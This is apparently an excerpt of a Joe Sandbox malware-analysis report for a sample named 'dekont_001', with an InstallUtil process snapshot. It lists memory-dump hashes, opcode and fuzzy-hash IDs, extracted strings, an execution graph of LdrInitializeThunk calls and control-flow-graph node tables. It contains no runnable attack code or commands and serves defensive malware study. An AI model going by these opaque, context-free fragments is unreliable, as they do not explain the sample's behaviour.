                                                • API String ID:
                                                • Opcode ID: e418198c73130eef0133f4cee824009df1e999f44821d1cc118cd592bc4098e3
                                                • Instruction ID: f9ef65e6c162b700b8f0de4933c6c5f0b4b15c50086e0c586e6489407d8471ec
                                                • Opcode Fuzzy Hash: e418198c73130eef0133f4cee824009df1e999f44821d1cc118cd592bc4098e3
                                                • Instruction Fuzzy Hash: B8E02BB1C4110CDBCB80FFF5C81069E7BF8DF04300F0045AAD40597110EE32DA509B9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b94c42f048c48348f5cc471f2ba530eaa475b9c0bdb83e4317e625c32958442c
                                                • Instruction ID: c0975f4b0a4a15e3a23ca8c89704954bceb05e7be3da92b4da8314fc77c62a3a
                                                • Opcode Fuzzy Hash: b94c42f048c48348f5cc471f2ba530eaa475b9c0bdb83e4317e625c32958442c
                                                • Instruction Fuzzy Hash: 02D01730A41208EF8B00EFA8EA0555DBBB9EB84214BA085A9E409D3310EA316F009BD1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f84e58067211b8bb08ac946e4cab5db0a51836b855ca653af9f55a4736760152
                                                • Instruction ID: 153c75f7c0c2f4f5d12290b2ac08249e644a4879a00b2257cdd5fa9e02ca2744
                                                • Opcode Fuzzy Hash: f84e58067211b8bb08ac946e4cab5db0a51836b855ca653af9f55a4736760152
                                                • Instruction Fuzzy Hash: 7EC08C3374A2548FAB0419A8BC880ACF314F68833A304167FE00A86300CB3100584780
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7bef2dfc289b10ddd37171a0a36120fb6f4b99d780531c95280718176208f143
                                                • Instruction ID: d1be27f434d9976c5808cd0e6c4bd939e2e9ff38c727967977518abfa138f1ad
                                                • Opcode Fuzzy Hash: 7bef2dfc289b10ddd37171a0a36120fb6f4b99d780531c95280718176208f143
                                                • Instruction Fuzzy Hash: 7BC02BB088B30D82C38816C4700C3743BDCC383313F883C21690C05091CBA020ACCA14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b748a444ed53ad3993785ed687508c0330b9afdcf23db5e94f94c57dffc985b
                                                • Instruction ID: 82b8524dba4e56a4a191c330689ca04350746b52a0b19f98a666ebab6f9c564b
                                                • Opcode Fuzzy Hash: 2b748a444ed53ad3993785ed687508c0330b9afdcf23db5e94f94c57dffc985b
                                                • Instruction Fuzzy Hash: BBD02230250108CBC314EF84D5ACBAB3362E78A300F004080A00E433C8DB345E48CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09047cec585ac833b88d1351425f7c62ee81ab425ab278fe3140f347b6e0427d
                                                • Instruction ID: 17f0838dee1d48823e3be4ed46852cf12308b8dcddc8438a337b67575d400a67
                                                • Opcode Fuzzy Hash: 09047cec585ac833b88d1351425f7c62ee81ab425ab278fe3140f347b6e0427d
                                                • Instruction Fuzzy Hash: 34C0928790A2C48FC2070BF81DB62C13FB0DCAB04538C04C2C882CE1A3B1185507B2A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d9c615318c477bcb2eb7be46b36e8727291870ddc83643a3750a27c7933384b
                                                • Instruction ID: db3c14c7922fae649f773a4254936f0d50bd917bc9e0a614eafeb0721976418c
                                                • Opcode Fuzzy Hash: 3d9c615318c477bcb2eb7be46b36e8727291870ddc83643a3750a27c7933384b
                                                • Instruction Fuzzy Hash: B1902232080A0C8B020023C0B008008B30C80003003800002A00C028028E2330200088
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'kq$4'kq
                                                • API String ID: 0-4171853269
                                                • Opcode ID: a5b3a584d75f8d89289a39e2a86096ad76651b031218acc3a2532bb500c5a64c
                                                • Instruction ID: df755e816f3dbe40910ffbec35e0ddd7a3c6f77d04f0f2351234a0d264053e02
                                                • Opcode Fuzzy Hash: a5b3a584d75f8d89289a39e2a86096ad76651b031218acc3a2532bb500c5a64c
                                                • Instruction Fuzzy Hash: 2E714D70E01A049FD708DFAAE98569EBBF3BF84301F14D96AD0059B3A9EF346945CB50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'kq$4'kq
                                                • API String ID: 0-4171853269
                                                • Opcode ID: 2c2a5b9aef60ccc8cb8ed07f1624a72c307c440b6f0784dca88cf54166b441b6
                                                • Instruction ID: 93990909acf935e8f75bb81cde4d8fa726045cd28172dadee551ad88f1d4d93a
                                                • Opcode Fuzzy Hash: 2c2a5b9aef60ccc8cb8ed07f1624a72c307c440b6f0784dca88cf54166b441b6
                                                • Instruction Fuzzy Hash: 37714D70E01A049FD708DFAAE98169EBBF3BF84300F14D96AD0049B3A9EF346945CB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc4343fa043ec727875a78a2cfc4f4468b241ae756de584bcf72f7d48c43b826
                                                • Instruction ID: 09afea8479b8b7bd92966e21f432a9f09daf295be8b9b3a3bb0d4f441c777cb7
                                                • Opcode Fuzzy Hash: fc4343fa043ec727875a78a2cfc4f4468b241ae756de584bcf72f7d48c43b826
                                                • Instruction Fuzzy Hash: EF9107B4E15218CFEB68DFA9C84479DBBF1BF4A305F1480B9C909AB280DB755989CF41
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 103f5f10465da10b4240f08a55ec68553404cb6439d5bde05b2ac4ca01f65125
                                                • Instruction ID: 04966de68a2cfa883fc2a730e4cce6f1947b005292f3ffbe5c7370efee948c74
                                                • Opcode Fuzzy Hash: 103f5f10465da10b4240f08a55ec68553404cb6439d5bde05b2ac4ca01f65125
                                                • Instruction Fuzzy Hash: 04315971D057958FD72ACF6A8C153CABBF6AF8A200F09C0EAC448AA166DB7409858F50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1845449702.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7100000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9df720a14f11c54966a56c0710865900c851c035f270ccd3315dfe32e179f2af
                                                • Instruction ID: 86dd5068afa069c7197f44ba84848ed120167dfca28f959c07cea518e49e5d6b
                                                • Opcode Fuzzy Hash: 9df720a14f11c54966a56c0710865900c851c035f270ccd3315dfe32e179f2af
                                                • Instruction Fuzzy Hash: 9F21CCB1D046298BEB28CF5BCC5539AFAF7AF89300F04C0EA941CA6254EB704A859F40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
                                                • API String ID: 0-998880824
                                                • Opcode ID: 233ba35b195fad298d1aba8d3d5aa093d70c21c9e1adefaf22d90c29fc738bfe
                                                • Instruction ID: d2c74c69451ce542255886308e113495c124120d1ec1f56a18090486027811cf
                                                • Opcode Fuzzy Hash: 233ba35b195fad298d1aba8d3d5aa093d70c21c9e1adefaf22d90c29fc738bfe
                                                • Instruction Fuzzy Hash: 66C0CA1050F3D0CECF030A3888A02303E60AE62260319A0DAD4824B447DA288487E327
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *)$4$4'kq$4'kq$TJpq
                                                • API String ID: 0-3472178802
                                                • Opcode ID: 9097e0645aa8830ce7156cf26abda4b61ab906a163151895df01c9f4f6169714
                                                • Instruction ID: 9940c89a691b1735b335070f0133a2fe74c98642fdfad39d9c8815993e97181a
                                                • Opcode Fuzzy Hash: 9097e0645aa8830ce7156cf26abda4b61ab906a163151895df01c9f4f6169714
                                                • Instruction Fuzzy Hash: C9F09070B412188FD7289A7D491476F79DB7BCC304F309098A10AAB3E8DF39ED468791
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *)$TJpq$$kq$$kq
                                                • API String ID: 0-2724558860
                                                • Opcode ID: aeafdc4426e95c7e2bc9bd1dce501b06456631727d8ba95cc4266c861e33f0b3
                                                • Instruction ID: a66392dc7c3b056d20d04df85e8a361b0256cb02b1057d3578113446be922b32
                                                • Opcode Fuzzy Hash: aeafdc4426e95c7e2bc9bd1dce501b06456631727d8ba95cc4266c861e33f0b3
                                                • Instruction Fuzzy Hash: C1F0B470B412188FD32CE73D491472F29DB6BCC300F205459610AAB3D5DD39DC824791
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJpq$jjjjjj$$kq$$kq
                                                • API String ID: 0-2568102283
                                                • Opcode ID: f7146fba6ddcdf01cc0842ddc7b8f5fc44f599cea825f99eaa8902cb09b9f3f1
                                                • Instruction ID: 070040ca995ffd7382b7f68fc869735e9ad6ce7aac62bc679add8ed7814ab329
                                                • Opcode Fuzzy Hash: f7146fba6ddcdf01cc0842ddc7b8f5fc44f599cea825f99eaa8902cb09b9f3f1
                                                • Instruction Fuzzy Hash: DFA02230000000CECB0AEE80CCC0A303328FF8230AB38C0AAC00B8F200C330C0CACB22

                                                Execution Graph

                                                Execution Coverage:15.5%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:26.4%
                                                Total number of Nodes:53
                                                Total number of Limit Nodes:5
                                                execution_graph 25761 10acee8 25762 10acef4 25761->25762 25769 66a11c0 25762->25769 25776 66a11b0 25762->25776 25763 10acfa8 25783 66d8608 25763->25783 25790 66d85f8 25763->25790 25764 10ad0c7 25770 66a11e2 25769->25770 25771 66a12ae 25770->25771 25797 66a7d90 25770->25797 25803 66a8174 25770->25803 25809 66a7b70 25770->25809 25813 66a7b60 25770->25813 25771->25763 25777 66a11e2 25776->25777 25778 66a12ae 25777->25778 25779 66a7d90 2 API calls 25777->25779 25780 66a7b60 2 API calls 25777->25780 25781 66a7b70 LdrInitializeThunk 25777->25781 25782 66a8174 2 API calls 25777->25782 25778->25763 25779->25778 25780->25778 25781->25778 25782->25778 25784 66d862a 25783->25784 25785 66d873c 25784->25785 25786 66a7d90 2 API calls 25784->25786 25787 66a7b60 2 API calls 25784->25787 25788 66a7b70 LdrInitializeThunk 25784->25788 25789 66a8174 2 API calls 25784->25789 25785->25764 25786->25785 25787->25785 25788->25785 25789->25785 25791 66d862a 25790->25791 25792 66d873c 25791->25792 25793 66a7d90 2 API calls 25791->25793 25794 66a7b60 2 API calls 25791->25794 25795 66a7b70 LdrInitializeThunk 25791->25795 25796 66a8174 2 API calls 25791->25796 25792->25764 25793->25792 25794->25792 25795->25792 25796->25792 25802 66a7dc1 25797->25802 25798 66a7f21 25798->25771 25799 66a816c LdrInitializeThunk 25799->25798 25801 66a7b70 LdrInitializeThunk 25801->25802 25802->25798 25802->25799 25802->25801 25807 66a802b 25803->25807 25804 66a816c LdrInitializeThunk 25806 66a82c9 25804->25806 25806->25771 25807->25804 25808 66a7b70 LdrInitializeThunk 25807->25808 25808->25807 25810 66a7b82 25809->25810 25812 66a7b87 25809->25812 25810->25771 25811 66a82b1 LdrInitializeThunk 25811->25810 25812->25810 25812->25811 25814 66a7b82 25813->25814 25818 66a7b87 25813->25818 25814->25771 25815 66a816c LdrInitializeThunk 25815->25814 25817 66a7b70 LdrInitializeThunk 25817->25818 25818->25814 25818->25815 25818->25817 25819 66a8460 25820 66a8467 25819->25820 25822 66a846d 25819->25822 25821 66a7b70 LdrInitializeThunk 25820->25821 25820->25822 25824 66a87ee 25820->25824 25821->25824 25823 66a7b70 LdrInitializeThunk 25823->25824 25824->25822 25824->25823

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 146 10abac0-10abac1 147 10abac3-10abaf0 146->147 148 10abaa7 146->148 155 10abaf2 147->155 156 10abaf7-10abbd4 call 10a3908 call 10a3428 147->156 149 10abaa8-10abab2 148->149 150 10aba94-10aba96 148->150 152 10aba28-10aba43 150->152 153 10aba98-10abaa3 150->153 161 10aba5b-10aba5c 152->161 162 10aba45-10aba5a 152->162 153->149 155->156 174 10abbdb-10abbfc call 10a4dd0 156->174 175 10abbd6 156->175 161->150 162->161 177 10abc01-10abc0c 174->177 175->174 178 10abc0e 177->178 179 10abc13-10abc17 177->179 178->179 180 10abc19-10abc1a 179->180 181 10abc1c-10abc23 179->181 182 10abc3b-10abc7f 180->182 183 10abc2a-10abc38 181->183 184 10abc25 181->184 188 10abce5-10abcfc 182->188 183->182 184->183 190 10abcfe-10abd23 188->190 191 10abc81-10abc97 188->191 197 10abd3b 190->197 198 10abd25-10abd3a 190->198 194 10abc99-10abca5 191->194 195 10abcc1 191->195 199 10abcaf-10abcb5 194->199 200 10abca7-10abcad 194->200 201 10abcc7-10abce4 195->201 198->197 202 10abcbf 199->202 200->202 201->188 202->201
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq$PHkq$PHkq
                                                • API String ID: 0-2991185022
                                                • Opcode ID: c1d2c27e082fab0f17e915b1104d93234767aeb2a0599fb3deb1aa97477d3374
                                                • Instruction ID: 482365151d34841ef0213084e86f34e08128f18bc83b7ae49732b4d8ef106e9f
                                                • Opcode Fuzzy Hash: c1d2c27e082fab0f17e915b1104d93234767aeb2a0599fb3deb1aa97477d3374
                                                • Instruction Fuzzy Hash: 46A1F674E00219CFDB14DFAAD994A9EBBF2BF88300F54C06AE449AB365DB319941CF51

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 206 10a6748-10a677e 207 10a6786-10a678c 206->207 337 10a6780 call 10a6748 206->337 338 10a6780 call 10a6898 206->338 339 10a6780 call 10a6120 206->339 208 10a678e-10a6792 207->208 209 10a67dc-10a67e0 207->209 212 10a67a1-10a67a8 208->212 213 10a6794-10a6799 208->213 210 10a67e2-10a67f1 209->210 211 10a67f7-10a680b 209->211 214 10a681d-10a6827 210->214 215 10a67f3-10a67f5 210->215 216 10a6813-10a681a 211->216 334 10a680d call 10a9868 211->334 335 10a680d call 10a9861 211->335 217 10a687e-10a68bb 212->217 218 10a67ae-10a67b5 212->218 213->212 220 10a6829-10a682f 214->220 221 10a6831-10a6835 214->221 215->216 227 10a68bd-10a68c3 217->227 228 10a68c6-10a68e6 217->228 218->209 219 10a67b7-10a67bb 218->219 222 10a67ca-10a67d1 219->222 223 10a67bd-10a67c2 219->223 224 10a683d-10a6877 220->224 221->224 226 10a6837 221->226 222->217 229 10a67d7-10a67da 222->229 223->222 224->217 226->224 227->228 234 10a68e8 228->234 235 10a68ed-10a68f4 228->235 229->216 237 10a6c7c-10a6c85 234->237 238 10a68f6-10a6901 235->238 239 10a6c8d-10a6cc9 238->239 240 10a6907-10a691a 238->240 249 10a6ccb-10a6cd0 239->249 250 10a6cd2-10a6cd6 239->250 245 10a691c-10a692a 240->245 246 10a6930-10a694b 240->246 245->246 252 10a6c04-10a6c0b 245->252 254 10a696f-10a6972 246->254 255 10a694d-10a6953 246->255 253 10a6cdc-10a6cdd 249->253 250->253 252->237 260 10a6c0d-10a6c0f 252->260 256 10a6978-10a697b 254->256 257 10a6acc-10a6ad2 254->257 258 10a695c-10a695f 255->258 259 10a6955 255->259 256->257 263 10a6981-10a6987 256->263 261 10a6ad8-10a6add 257->261 262 10a6bbe-10a6bc1 257->262 264 10a6992-10a6998 258->264 265 10a6961-10a6964 258->265 259->257 259->258 259->262 259->264 266 10a6c1e-10a6c24 260->266 267 10a6c11-10a6c16 260->267 261->262 272 10a6c88 262->272 273 10a6bc7-10a6bcd 262->273 263->257 271 10a698d 263->271 274 10a699a-10a699c 264->274 275 10a699e-10a69a0 264->275 268 10a696a 265->268 269 10a69fe-10a6a04 265->269 266->239 270 10a6c26-10a6c2b 266->270 267->266 268->262 269->262 278 10a6a0a-10a6a10 269->278 276 10a6c2d-10a6c32 270->276 277 10a6c70-10a6c73 270->277 271->262 272->239 279 10a6bcf-10a6bd7 273->279 280 10a6bf2-10a6bf6 273->280 281 10a69aa-10a69b3 274->281 275->281 276->272 283 10a6c34 276->283 277->272 282 10a6c75-10a6c7a 277->282 284 10a6a12-10a6a14 278->284 285 10a6a16-10a6a18 278->285 279->239 286 10a6bdd-10a6bec 279->286 280->252 289 10a6bf8-10a6bfe 280->289 287 10a69c6-10a69ee 281->287 288 10a69b5-10a69c0 281->288 282->237 282->260 290 10a6c3b-10a6c40 283->290 291 10a6a22-10a6a39 284->291 285->291 286->246 286->280 309 10a6ae2-10a6b18 287->309 310 10a69f4-10a69f9 287->310 288->262 288->287 289->238 289->252 292 10a6c62-10a6c64 290->292 293 10a6c42-10a6c44 290->293 303 10a6a3b-10a6a54 291->303 304 10a6a64-10a6a8b 291->304 292->272 300 10a6c66-10a6c69 292->300 297 10a6c53-10a6c59 293->297 298 10a6c46-10a6c4b 293->298 297->239 302 10a6c5b-10a6c60 297->302 298->297 300->277 302->292 305 10a6c36-10a6c39 302->305 303->309 313 10a6a5a-10a6a5f 303->313 304->272 315 10a6a91-10a6a94 304->315 305->272 305->290 316 10a6b1a-10a6b1e 309->316 317 10a6b25-10a6b2d 309->317 310->309 313->309 315->272 318 10a6a9a-10a6ac3 315->318 319 10a6b3d-10a6b41 316->319 320 10a6b20-10a6b23 316->320 317->272 321 10a6b33-10a6b38 317->321 318->309 333 10a6ac5-10a6aca 318->333 322 10a6b43-10a6b49 319->322 323 10a6b60-10a6b64 319->323 320->317 320->319 321->262 322->323 325 10a6b4b-10a6b53 322->325 326 10a6b6e-10a6b8d call 10a6e70 323->326 327 10a6b66-10a6b6c 323->327 325->272 329 10a6b59-10a6b5e 325->329 328 10a6b93-10a6b97 326->328 327->326 327->328 328->262 331 10a6b99-10a6bb5 328->331 329->262 331->262 333->309 334->216 335->216 337->207 338->207 339->207
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (okq$(okq$(okq$,oq$,oq
                                                • API String ID: 0-3760967313
                                                • Opcode ID: 96516066b60885bdf356c4d7f85a97539b4008f282e49b37deb6faf0437e0e72
                                                • Instruction ID: b74fe5a82ee30b70f45c9c86d60a971b2a52bdbbf5deb8517d488c95d48e7d09
                                                • Opcode Fuzzy Hash: 96516066b60885bdf356c4d7f85a97539b4008f282e49b37deb6faf0437e0e72
                                                • Instruction Fuzzy Hash: 1C127170A00219DFCB55CFA9C984AAEBBF6FF88300F5981A9E545AB261D732DD41CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 449 10ab338-10ab34b 450 10ab48a-10ab491 449->450 451 10ab351-10ab35a 449->451 452 10ab360-10ab364 451->452 453 10ab494 451->453 454 10ab37e-10ab385 452->454 455 10ab366 452->455 458 10ab499-10ab4c0 453->458 454->450 457 10ab38b-10ab398 454->457 456 10ab369-10ab374 455->456 456->453 459 10ab37a-10ab37c 456->459 457->450 462 10ab39e-10ab3b1 457->462 466 10ab4ec 458->466 467 10ab4c2-10ab4da 458->467 459->454 459->456 464 10ab3b3 462->464 465 10ab3b6-10ab3be 462->465 464->465 468 10ab42b-10ab42d 465->468 469 10ab3c0-10ab3c6 465->469 470 10ab4ee 466->470 479 10ab4dc-10ab4e1 467->479 480 10ab4e3-10ab4e6 467->480 468->450 471 10ab42f-10ab435 468->471 469->468 473 10ab3c8-10ab3ce 469->473 474 10ab4ef-10ab4f2 470->474 471->450 475 10ab437-10ab441 471->475 473->458 476 10ab3d4-10ab3ec 473->476 475->458 477 10ab443-10ab45b 475->477 487 10ab419-10ab41c 476->487 488 10ab3ee-10ab3f4 476->488 490 10ab45d-10ab463 477->490 491 10ab480-10ab483 477->491 479->470 483 10ab4e8-10ab4ea 480->483 484 10ab4f3-10ab509 480->484 483->466 483->467 484->474 493 10ab50b-10ab530 484->493 487->453 494 10ab41e-10ab421 487->494 488->458 492 10ab3fa-10ab40e 488->492 490->458 495 10ab465-10ab479 490->495 491->453 496 10ab485-10ab488 491->496 492->458 503 10ab414 492->503 497 10ab532 493->497 498 10ab537-10ab614 call 10a3908 call 10a3428 493->498 494->453 499 10ab423-10ab429 494->499 495->458 504 10ab47b 495->504 496->450 496->475 497->498 513 10ab61b-10ab63c call 10a4dd0 498->513 514 10ab616 498->514 499->468 499->469 503->487 504->491 516 10ab641-10ab64c 513->516 514->513 517 10ab64e 516->517 518 10ab653-10ab657 516->518 517->518 519 10ab659-10ab65a 518->519 520 10ab65c-10ab663 518->520 521 10ab67b-10ab6bf 519->521 522 10ab66a-10ab678 520->522 523 10ab665 520->523 527 10ab725-10ab73c 521->527 522->521 523->522 529 10ab73e-10ab763 527->529 530 10ab6c1-10ab6d7 527->530 536 10ab77b 529->536 537 10ab765-10ab77a 529->537 534 10ab6d9-10ab6e5 530->534 535 10ab701 530->535 538 10ab6ef-10ab6f5 534->538 539 10ab6e7-10ab6ed 534->539 540 10ab707-10ab724 535->540 543 10ab77c 536->543 537->536 541 10ab6ff 538->541 539->541 540->527 541->540 543->543
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                • API String ID: 0-1749821215
                                                • Opcode ID: 515a75402baf3fb8de77fac94abe607a01bb73f47013b79e595c1ae5f8189bc5
                                                • Instruction ID: 29dd17ad59d0bfeb5f96ede85667fd9b408c25ad0c3627b5f70d87af7be71d03
                                                • Opcode Fuzzy Hash: 515a75402baf3fb8de77fac94abe607a01bb73f47013b79e595c1ae5f8189bc5
                                                • Instruction Fuzzy Hash: 49E10875E00218CFDB14CFA9D984A9EBBF2FF49300F5580A9E949AB361DB31A841CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 546 10ab7e2-10ab7e5 547 10ab7cb-10ab7cc 546->547 548 10ab7e7-10ab7e9 546->548 549 10ab7cf-10ab7d2 547->549 548->549 550 10ab7eb-10ab810 548->550 551 10ab812 550->551 552 10ab817-10ab8f4 call 10a3908 call 10a3428 550->552 551->552 562 10ab8fb-10ab91c call 10a4dd0 552->562 563 10ab8f6 552->563 565 10ab921-10ab92c 562->565 563->562 566 10ab92e 565->566 567 10ab933-10ab937 565->567 566->567 568 10ab939-10ab93a 567->568 569 10ab93c-10ab943 567->569 570 10ab95b-10ab99f 568->570 571 10ab94a-10ab958 569->571 572 10ab945 569->572 576 10aba05-10aba1c 570->576 571->570 572->571 578 10aba1e-10aba32 576->578 579 10ab9a1-10ab9b7 576->579 580 10aba34-10aba43 578->580 583 10ab9b9-10ab9c5 579->583 584 10ab9e1 579->584 585 10aba5b-10aba96 580->585 586 10aba45-10aba5a 580->586 587 10ab9cf-10ab9d5 583->587 588 10ab9c7-10ab9cd 583->588 589 10ab9e7-10aba04 584->589 596 10aba28-10aba2f 585->596 597 10aba98-10abab2 585->597 586->585 590 10ab9df 587->590 588->590 589->576 590->589 596->580
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                • API String ID: 0-1749821215
                                                • Opcode ID: 787369a5ac921d7104f3ac1d9e485747c7e768fa699d4522de248feb999fc334
                                                • Instruction ID: 8e98babf11abc72b44a5cdf81460a3d2a2a24b36d93c86c6b7471c7342e1df5f
                                                • Opcode Fuzzy Hash: 787369a5ac921d7104f3ac1d9e485747c7e768fa699d4522de248feb999fc334
                                                • Instruction Fuzzy Hash: 0C81D574E00218DFDB54DFAAD984A9DBBF2BF88300F14C06AE449AB365DB359985CF10

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 601 10ac761-10ac768 602 10ac76a-10ac790 601->602 603 10ac6ed-10ac6fb 601->603 604 10ac792 602->604 605 10ac797-10ac874 call 10a3908 call 10a3428 602->605 612 10ac6fc 603->612 604->605 619 10ac87b-10ac89c call 10a4dd0 605->619 620 10ac876 605->620 612->612 622 10ac8a1-10ac8ac 619->622 620->619 623 10ac8ae 622->623 624 10ac8b3-10ac8b7 622->624 623->624 625 10ac8b9-10ac8ba 624->625 626 10ac8bc-10ac8c3 624->626 627 10ac8db-10ac91f 625->627 628 10ac8ca-10ac8d8 626->628 629 10ac8c5 626->629 633 10ac985-10ac99c 627->633 628->627 629->628 635 10ac99e-10ac9c3 633->635 636 10ac921-10ac937 633->636 642 10ac9db 635->642 643 10ac9c5-10ac9da 635->643 640 10ac939-10ac945 636->640 641 10ac961 636->641 644 10ac94f-10ac955 640->644 645 10ac947-10ac94d 640->645 646 10ac967-10ac984 641->646 643->642 647 10ac95f 644->647 645->647 646->633 647->646
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0oNp$LjNp$LjNp$PHkq$PHkq
                                                • API String ID: 0-1749821215
                                                • Opcode ID: 532fa7c668c7f1dfd63165e69d9022ab80d61043443c223dd0a77b7b3629ef39
